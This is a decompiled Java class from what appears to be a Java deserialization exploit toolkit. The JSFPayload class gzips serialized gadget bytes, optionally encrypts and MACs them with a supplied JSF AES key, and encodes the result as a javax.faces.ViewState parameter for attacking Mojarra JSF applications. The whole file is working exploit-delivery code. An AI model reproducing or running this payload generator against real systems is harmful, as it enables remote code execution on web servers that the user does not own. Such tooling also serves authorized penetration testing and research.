/*
 * Decompiled with CFR 0.152.
 */
package com.ar3h.chains.core.payload.impl;

import com.ar3h.chains.common.Payload;
import com.ar3h.chains.common.annotations.PayloadAnnotation;
import com.ar3h.chains.common.param.Param;
import java.io.ByteArrayOutputStream;
import java.net.URLEncoder;
import java.security.InvalidAlgorithmParameterException;
import java.security.InvalidKeyException;
import java.security.Key;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;
import java.util.zip.GZIPOutputStream;
import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.Mac;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.SecretKey;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import javax.faces.FacesException;
import javax.xml.bind.DatatypeConverter;
import org.apache.commons.codec.binary.Base64;

@PayloadAnnotation(name="JSF Payload \u751f\u6210", description="Mojarra JSF \u53cd\u5e8f\u5217\u5316\nReference: https://github.com/B0T1eR/ysoSimple/blob/master/src/main/java/cn/butler/yso/config/YsoConfig.java", gadgetTags={"JavaNativeDeserializePayload"}, mode={"Generate"}, authors={"B0T1eR"})
public class JSFPayload
implements Payload {
    @Param(name="JSF AES Key", description="Key \u4e3a Base64 \u683c\u5f0f\uff0c\u8001\u7248\u672c\u65e0\u9700 key", requires=false)
    String jsfEncryptKey = "";

    public Object marshal(Object object) throws Exception {
        return this.getObject((byte[])object);
    }

    public Object getObject(byte[] object) throws Exception {
        byte[] payload = object;
        payload = this.gzip(payload);
        if (!"".equalsIgnoreCase(this.jsfEncryptKey)) {
            byte[] keyArray = DatatypeConverter.parseBase64Binary((String)this.jsfEncryptKey);
            SecretKeySpec secretKeySpec = new SecretKeySpec(keyArray, "AES");
            JSFUtils JSFUtils2 = new JSFUtils();
            JSFUtils2.setSk(secretKeySpec);
            payload = JSFUtils2.jsfFacesEncrypt(payload);
        }
        String base64String = Base64.encodeBase64String(payload);
        String urlString = URLEncoder.encode(base64String);
        return "javax.faces.ViewState=" + urlString;
    }

    private byte[] gzip(byte[] data) throws Exception {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        try (GZIPOutputStream gzos = new GZIPOutputStream(baos);){
            gzos.write(data);
        }
        return baos.toByteArray();
    }

    class JSFUtils {
        private SecretKey facesSecretKey;

        JSFUtils() {
        }

        public void setSk(SecretKey sk) {
            this.facesSecretKey = sk;
        }

        public byte[] jsfFacesEncrypt(byte[] bytes) throws InvalidAlgorithmParameterException, InvalidKeyException, NoSuchPaddingException, NoSuchAlgorithmException, IllegalBlockSizeException, BadPaddingException {
            byte[] securedata = null;
            SecureRandom rand = new SecureRandom();
            byte[] iv = new byte[16];
            rand.nextBytes(iv);
            IvParameterSpec ivspec = new IvParameterSpec(iv);
            Cipher encryptCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
            encryptCipher.init(1, (Key)this.facesSecretKey, ivspec);
            Mac encryptMac = Mac.getInstance("HmacSHA256");
            encryptMac.init(this.facesSecretKey);
            encryptMac.update(iv);
            byte[] encdata = encryptCipher.doFinal(bytes);
            byte[] macBytes = encryptMac.doFinal(encdata);
            byte[] tmp = this.concatBytes(macBytes, iv);
            securedata = this.concatBytes(tmp, encdata);
            return securedata;
        }

        public byte[] concatBytes(byte[] array1, byte[] array2) {
            byte[] cBytes = new byte[array1.length + array2.length];
            try {
                System.arraycopy(array1, 0, cBytes, 0, array1.length);
                System.arraycopy(array2, 0, cBytes, array1.length, array2.length);
                return cBytes;
            }
            catch (Exception var4) {
                throw new FacesException((Throwable)var4);
            }
        }
    }
}

